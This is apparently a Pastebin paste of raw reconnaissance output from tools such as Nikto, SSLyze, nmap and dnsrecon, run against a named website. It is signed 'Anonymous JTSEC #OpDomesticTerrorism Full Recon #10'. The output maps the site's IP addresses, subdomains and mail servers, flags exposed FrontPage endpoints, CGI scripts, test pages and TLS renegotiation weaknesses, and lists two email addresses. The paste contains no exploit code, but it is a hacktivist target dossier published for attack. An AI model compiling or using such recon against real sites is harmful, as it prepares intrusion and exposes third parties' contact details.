  626. #######################################################################################################################################
  627. HTTP/1.1 200 OK
  628. Date: Fri, 17 Aug 2018 03:30:59 GMT
  629. Server: Apache
  630. Last-Modified: Thu, 06 Dec 2007 23:55:57 GMT
  631. ETag: "40c-440a6df015d40"
  632. Accept-Ranges: bytes
  633. Content-Length: 1036
  634. Content-Type: text/html
  635. #######################################################################################################################################
  636. ^ ^
  637. _ __ _ ____ _ __ _ _ ____
  638. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  639. | V V // o // _/ | V V // 0 // 0 // _/
  640. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  641. <
  642. ...'
  643.  
  644. WAFW00F - Web Application Firewall Detection Tool
  645.  
  646. By Sandro Gauci && Wendel G. Henrique
  647.  
  648. Checking https://mississippiwhiteknights.com
  649. Generic Detection results:
  650. No WAF detected by the generic detection
  651. Number of requests: 14
  652. #######################################################################################################################################
  653.  
  654.  
  655. AVAILABLE PLUGINS
  656. -----------------
  657.  
  658. PluginSessionResumption
  659. PluginCertInfo
  660. PluginHeartbleed
  661. PluginCompression
  662. PluginChromeSha1Deprecation
  663. PluginOpenSSLCipherSuites
  664. PluginHSTS
  665. PluginSessionRenegotiation
  666.  
  667.  
  668.  
  669. CHECKING HOST(S) AVAILABILITY
  670. -----------------------------
  671.  
  672. mississippiwhiteknights.com:443 => 207.150.212.85:443
  673.  
  674.  
  675.  
  676. SCAN RESULTS FOR MISSISSIPPIWHITEKNIGHTS.COM:443 - 207.150.212.85:443
  677. ---------------------------------------------------------------------
  678.  
  679. * Deflate Compression:
  680. OK - Compression disabled
  681.  
  682. * Session Renegotiation:
  683. Client-initiated Renegotiations: VULNERABLE - Server honors client-initiated renegotiations
  684. Secure Renegotiation: OK - Supported
  685.  
  686. * Certificate - Content:
  687. SHA1 Fingerprint: 19748f82cd2e883d65570e2fb4ee056c508ca2e7
  688. Common Name: *.securedata.net
  689. Issuer: RapidSSL RSA CA 2018
  690. Serial Number: 04D8CEFFF3C04787DCFA82FDAF7C35CC
  691. Not Before: Jul 24 00:00:00 2018 GMT
  692. Not After: Jul 24 12:00:00 2019 GMT
  693. Signature Algorithm: sha256WithRSAEncryption
  694. Public Key Algorithm: rsaEncryption
  695. Key Size: 2048 bit
  696. Exponent: 65537 (0x10001)
  697. X509v3 Subject Alternative Name: {'DNS': ['*.securedata.net', 'securedata.net']}
  698.  
  699. * Certificate - Trust:
  700. Hostname Validation: FAILED - Certificate does NOT match mississippiwhiteknights.com
  701. Google CA Store (09/2015): OK - Certificate is trusted
  702. Java 6 CA Store (Update 65): OK - Certificate is trusted
  703. Microsoft CA Store (09/2015): OK - Certificate is trusted
  704. Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
  705. Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
  706. Certificate Chain Received: ['*.securedata.net', 'RapidSSL RSA CA 2018']
  707.  
  708. * Certificate - OCSP Stapling:
  709. NOT SUPPORTED - Server did not send back an OCSP response.
  710.  
  711. * SSLV2 Cipher Suites:
  712. Server rejected all cipher suites.
  713.  
  714. * Session Resumption:
  715. With Session IDs: NOT SUPPORTED (0 successful, 5 failed, 0 errors, 5 total attempts).
  716. With TLS Session Tickets: OK - Supported
  717.  
  718. * SSLV3 Cipher Suites:
  719. Server rejected all cipher suites.
  720.  
  721.  
  722.  
  723. SCAN COMPLETED IN 11.40 S
  724. -------------------------
  725. Version: 1.11.11-static
  726. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  727.  
  728. Connected to 207.150.212.85
  729.  
  730. Testing SSL server mississippiwhiteknights.com on port 443 using SNI name mississippiwhiteknights.com
  731.  
  732. TLS Fallback SCSV:
  733. Server supports TLS Fallback SCSV
  734.  
  735. TLS renegotiation:
  736. Secure session renegotiation supported
  737.  
  738. TLS Compression:
  739. Compression disabled
  740.  
  741. Heartbleed:
  742. TLS 1.2 not vulnerable to heartbleed
  743. TLS 1.1 not vulnerable to heartbleed
  744. TLS 1.0 not vulnerable to heartbleed
  745.  
  746. Supported Server Cipher(s):
  747. Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
  748. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
  749. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  750. Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
  751. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
  752. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
  753. Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
  754. Accepted TLSv1.2 256 bits AES256-GCM-SHA384
  755. Accepted TLSv1.2 256 bits AES256-SHA256
  756. Accepted TLSv1.2 256 bits AES256-SHA
  757. Accepted TLSv1.2 256 bits CAMELLIA256-SHA
  758. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
  759. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
  760. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  761. Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
  762. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
  763. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
  764. Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
  765. Accepted TLSv1.2 128 bits AES128-GCM-SHA256
  766. Accepted TLSv1.2 128 bits AES128-SHA256
  767. Accepted TLSv1.2 128 bits AES128-SHA
  768. Accepted TLSv1.2 128 bits CAMELLIA128-SHA
  769. Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  770. Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
  771. Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
  772. Accepted TLSv1.1 256 bits AES256-SHA
  773. Accepted TLSv1.1 256 bits CAMELLIA256-SHA
  774. Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  775. Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
  776. Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
  777. Accepted TLSv1.1 128 bits AES128-SHA
  778. Accepted TLSv1.1 128 bits CAMELLIA128-SHA
  779. Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  780. Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
  781. Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
  782. Accepted TLSv1.0 256 bits AES256-SHA
  783. Accepted TLSv1.0 256 bits CAMELLIA256-SHA
  784. Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  785. Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
  786. Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
  787. Accepted TLSv1.0 128 bits AES128-SHA
  788. Accepted TLSv1.0 128 bits CAMELLIA128-SHA
  789.  
  790. SSL Certificate:
  791. Signature Algorithm: sha256WithRSAEncryption
  792. RSA Key Strength: 2048
  793.  
  794. Subject: *.securedata.net
  795. Altnames: DNS:*.securedata.net, DNS:securedata.net
  796. Issuer: RapidSSL RSA CA 2018
  797.  
  798. Not valid before: Jul 24 00:00:00 2018 GMT
  799. Not valid after: Jul 24 12:00:00 2019 GMT
  800.  
  801. #######################################################################################################################################
  802.  
  803. I, [2018-08-16T23:33:28.460656 #20336] INFO -- : Initiating port scan
  804. I, [2018-08-16T23:34:23.376069 #20336] INFO -- : Using nmap scan output file logs/nmap_output_2018-08-16_23-33-28.xml
  805. I, [2018-08-16T23:34:23.401536 #20336] INFO -- : Discovered open port: 207.150.212.85:80
  806. I, [2018-08-16T23:34:25.197384 #20336] INFO -- : Discovered open port: 207.150.212.85:443
  807. W, [2018-08-16T23:34:28.671206 #20336] WARN -- : Yasuo did not find any potential hosts to
  808. #######################################################################################################################################
  809. [*] Performing General Enumeration of Domain: mississippiwhiteknights.com
  810. [-] DNSSEC is not configured for mississippiwhiteknights.com
  811. [*] SOA adns.cs.siteprotect.com 64.41.112.12
  812. [*] NS adns.cs.siteprotect.com 64.41.112.12
  813. [*] Bind Version for 64.41.112.12 Served by PowerDNS - https://www.powerdns.com/
  814. [*] NS bdns.cs.siteprotect.com 64.41.114.12
  815. [*] Bind Version for 64.41.114.12 Served by PowerDNS - https://www.powerdns.com/
  816. [*] A mississippiwhiteknights.com 207.150.212.85
  817. [*] Enumerating SRV Records
  818. [-] No SRV Records Found for mississippiwhiteknights.com
  819. [+] 0 Records Found
  820. #######################################################################################################################################
  821. Ip Address Status Type Domain Name Server
  822. ---------- ------ ---- ----------- ------
  823. 207.150.212.85 200 host ftp.mississippiwhiteknights.com Apache
  824. 64.26.60.153 host mail.mississippiwhiteknights.com
  825. 64.26.60.229 host pop.mississippiwhiteknights.com
  826. 64.26.60.229 host smtp.mississippiwhiteknights.com
  827. 207.150.212.85 200 host www.mississippiwhiteknights.com Apache
  828. ####################################################################################################################################### =======================================================================================================================================
  829. Hosts 5
  830. DNS Records 5
  831. Subdomains 5
  832.  
  833. Hosts (5)
  834. =======================================================================================================================================
  835. 64.26.60.153
  836. 64.26.60.229
  837. 64.41.112.12
  838. 64.41.114.12
  839. 207.150.212.85
  840.  
  841. DNS Records (5)
  842. =======================================================================================================================================
  843. mississippiwhiteknights.com A 207.150.212.85
  844. mail.mississippiwhiteknights.com MX 64.26.60.153
  845. adns.cs.siteprotect.com NS 64.41.112.12
  846. bdns.cs.siteprotect.com NS 64.41.114.12
  847. adns.cs.siteprotect.com SOA 64.41.112.12
  848.  
  849. Subdomains (5)
  850. =======================================================================================================================================
  851. ftp.mississippiwhiteknights.com 207.150.212.85
  852. mail.mississippiwhiteknights.com 64.26.60.153
  853. pop.mississippiwhiteknights.com 64.26.60.229
  854. smtp.mississippiwhiteknights.com 64.26.60.229
  855. www.mississippiwhiteknights.com 207.150.212.85
  856.  
  857. Loadbalancing
  858. =======================================================================================================================================
  859. Checking for DNS-Loadbalancing:
  860. NOT FOUND
  861.  
  862. Checking for HTTP-Loadbalancing [Server]:
  863. Apache
  864. NOT FOUND
  865.  
  866. Checking for HTTP-Loadbalancing [Date]:
  867. 04:17:01, 04:17:02, 04:17:04, 04:17:05, 04:17:07, 04:17:08, 04:17:09, 04:17:11, 04:17:12, 04:17:14,
  868. 04:17:16, 04:17:17, 04:17:18, 04:17:20, 04:17:21, 04:17:23, 04:17:24, 04:17:26, 04:17:27, 04:17:29,
  869. 04:17:30, 04:17:32, 04:17:33, 04:17:35, 04:17:36, 04:17:38, 04:17:39, 04:17:41, 04:17:42, 04:17:44,
  870. 04:17:45, 04:17:47, 04:17:48, 04:17:50, 04:17:51, 04:17:53, 04:17:54, 04:17:55, 04:17:57, 04:17:58,
  871. 04:18:00, 04:18:01, 04:18:03, 04:18:04, 04:18:06, 04:18:07, 04:18:09, 04:18:10, 04:18:12, 04:18:13,
  872. NOT FOUND
  873.  
  874. Checking for HTTP-Loadbalancing [Diff]:
  875. NOT FOUND
  876.  
  877.  
  878. Web Application Firewall
  879. =======================================================================================================================================
  880. No WAF detected by the generic detection
  881.  
  882. Traceroute
  883. =======================================================================================================================================
  884.  
  885. ICMP ECHO
  886. 1 public-gw.vpngate.net (10.211.254.254)
  887. 2 192.168.1.1 (192.168.1.1)
  888. 3 fp96f9b601.tkyc403.ap.nuro.jp (150.249.182.1)
  889. 4 118.238.196.48 (118.238.196.48)
  890. 5 39.110.253.217 (39.110.253.217)
  891. 6 202.213.194.33 (202.213.194.33)
  892. 7 ae-4.a01.tokyjp05.jp.bb.gin.ntt.net (120.88.53.9)
  893. 8 ae-24.r03.tokyjp05.jp.bb.gin.ntt.net (129.250.6.83)
  894. 9 * *
  895. 10 ae-1-12.bar2.Tampa1.Level3.net (4.69.137.117)
  896. 11 level3.co1.as30217.net (4.71.0.30)
  897. 12 * *
  898. 13 * *
  899. 14 207.150.212.85 (207.150.212.85)
  900.  
  901. TCP SYN
  902. 1 207.150.212.85 (207.150.212.85)
  903.  
  904. Zone Transfer
  905. =======================================================================================================================================
  906. Resolving SOA Record
  907. SOA adns.cs.siteprotect.com 64.41.112.12
  908. Resolving NS Records
  909. NS bdns.cs.siteprotect.com 64.41.114.12
  910. NS adns.cs.siteprotect.com 64.41.112.12
  911.  
  912. Trying NS server 64.41.114.12
  913. No answer or RRset not for qname
  914.  
  915. Trying NS server 64.41.112.12
  916. No answer or RRset not for qname
  917.  
  918. Whatweb
  919. =======================================================================================================================================
  920. ftp.mississippiwhiteknights.com [200 OK] Apache
  921. HTTPServer[Apache]
  922. IP[207.150.212.85]
  923. Title[Temporarily Disabled]
  924.  
  925. mail.mississippiwhiteknights.com [ Unassigned]
  926.  
  927. pop.mississippiwhiteknights.com [ Unassigned]
  928.  
  929. smtp.mississippiwhiteknights.com [ Unassigned]
  930.  
  931. www.mississippiwhiteknights.com [200 OK] ActiveX[D27CDB6E-AE6D-11cf-96B8-444553540000]
  932. Adobe-Flash
  933. Apache
  934. HTTPServer[Apache]
  935. IP[207.150.212.85]
  936. MetaGenerator[Microsoft FrontPage 5.0]
  937. Object[download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5
  938. 0
  939. 2
  940. 0][clsid:D27CDB6E-AE6D-11cf-96B8-444553540000]
  941.  
  942. #######################################################################################################################################
  943. ---------------------------------------------------------------------------------------------------------------------------------------
  944. + Target IP: 207.150.212.85
  945. + Target Hostname: mississippiwhiteknights.com
  946. + Target Port: 80
  947. + Start Time: 2018-08-16 23:29:32 (GMT-4)
  948. ---------------------------------------------------------------------------------------------------------------------------------------
  949. + Server: Apache
  950. + Server leaks inodes via ETags, header found with file /, fields: 0x40c 0x440a6df015d40
  951. + The anti-clickjacking X-Frame-Options header is not present.
  952. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  953. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  954. + "robots.txt" contains 1 entry which should be manually viewed.
  955. + Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
  956. + OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.
  957. + OSVDB-28260: /_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611: Gives info about server settings.
  958. + OSVDB-3233: /postinfo.html: Microsoft FrontPage default file found.
  959. + OSVDB-3092: /stats/: This might be interesting...
  960. + OSVDB-3092: /test.htm: This might be interesting...
  961. + OSVDB-3092: /test.html: This might be interesting...
  962. + OSVDB-3093: /cgi.cgi/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  963. + OSVDB-3093: /webcgi/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  964. + OSVDB-3093: /cgi-914/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  965. + OSVDB-3093: /cgi-915/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  966. + OSVDB-3093: /bin/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  967. + OSVDB-3093: /cgi/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  968. + OSVDB-3093: /mpcgi/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  969. + OSVDB-3093: /ows-bin/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  970. + OSVDB-3093: /cgi-sys/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  971. + OSVDB-3093: /cgi-local/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  972. + OSVDB-3093: /htbin/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  973. + OSVDB-3093: /cgibin/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  974. + OSVDB-3093: /cgis/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  975. + OSVDB-3093: /scripts/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  976. + OSVDB-3093: /cgi-win/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  977. + OSVDB-3093: /fcgi-bin/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  978. + OSVDB-3093: /cgi-exe/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  979. + OSVDB-3093: /cgi-home/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  980. + OSVDB-3093: /cgi-perl/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  981. + OSVDB-3093: /scgi-bin/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  982. + OSVDB-3093: /cgi-bin-sdb/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  983. + OSVDB-3093: /cgi-mod/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
  984. + OSVDB-3233: /_vti_bin/shtml.exe/_vti_rpc: FrontPage may be installed.
  985. + OSVDB-3233: /_vti_inf.html: FrontPage/SharePoint is installed and reveals its version number (check HTML source for more information).
  986. + 26228 requests: 0 error(s) and 36 item(s) reported on remote host
  987. + End Time: 2018-08-17 03:33:56 (GMT-4) (14664 seconds)
  988. ---------------------------------------------------------------------------------------------------------------------------------------#######################################################################################################################################
  989. =======================================================================================================================================
  990. | Domain: http://mississippiwhiteknights.com/
  991. | Server: Apache
  992. | IP: 207.150.212.85
  993. =======================================================================================================================================
  994. |
  995. | Directory check:
  996. | [+] CODE: 200 URL: http://mississippiwhiteknights.com/mysite/
  997. | [+] CODE: 200 URL: http://mississippiwhiteknights.com/stats/
  998. =======================================================================================================================================
  999. |
  1000. | File check:
  1001. | [+] CODE: 200 URL: http://mississippiwhiteknights.com/cgi-bin/cgiecho
  1002. | [+] CODE: 200 URL: http://mississippiwhiteknights.com/cgi-bin/cgiemail
  1003. | [+] CODE: 200 URL: http://mississippiwhiteknights.com/index.html
  1004. | [+] CODE: 200 URL: http://mississippiwhiteknights.com/postinfo.html
  1005. | [+] CODE: 200 URL: http://mississippiwhiteknights.com/robots.txt
  1006. | [+] CODE: 200 URL: http://mississippiwhiteknights.com/test.htm
  1007. | [+] CODE: 200 URL: http://mississippiwhiteknights.com/test.html
  1008. | [+] CODE: 200 URL: http://mississippiwhiteknights.com/_vti_bin/shtml.exe
  1009. | [+] CODE: 200 URL: http://mississippiwhiteknights.com/_vti_bin/shtml.exe/junk_nonexistant.exe
  1010. | [+] CODE: 200 URL: http://mississippiwhiteknights.com/_vti_bin/shtml.exe/_vti_rpc
  1011. | [+] CODE: 200 URL: http://mississippiwhiteknights.com/_vti_inf.html
  1012. ======================================================================================================================================
  1013. #######################################################################################################################################
  1014. | External hosts:
  1015. | [+] External Host Found: http://www.skynetweb.com
  1016. | [+] External Host Found: http://www.winsave.com
  1017. | [+] External Host Found: http://www.affinity.com
  1018. | [+] External Host Found: http://www.hostsave.com
  1019. | [+] External Host Found: http://www.valueweb.com
  1020. |
  1021. | FCKeditor File Upload:
  1022. |
  1023. | File Upload Forms:
  1024. |
  1025. | E-mails:
  1026. | [+] E-mail Found: mswhiteknights@gmail.com
  1027. | [+] E-mail Found: mississippiwhiteknights@gmail.com
  1028. |
  1029. | Timthumb:
  1030. |
  1031. | Ignored Files:
  1032. | http://mississippiwhiteknights.com/pow_files/filelist.xml
  1033. =======================================================================================================================================
  1034. #######################################################################################################################################
  1035. Anonymous JTSEC #OpDomesticTerrorism Full Recon #10
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!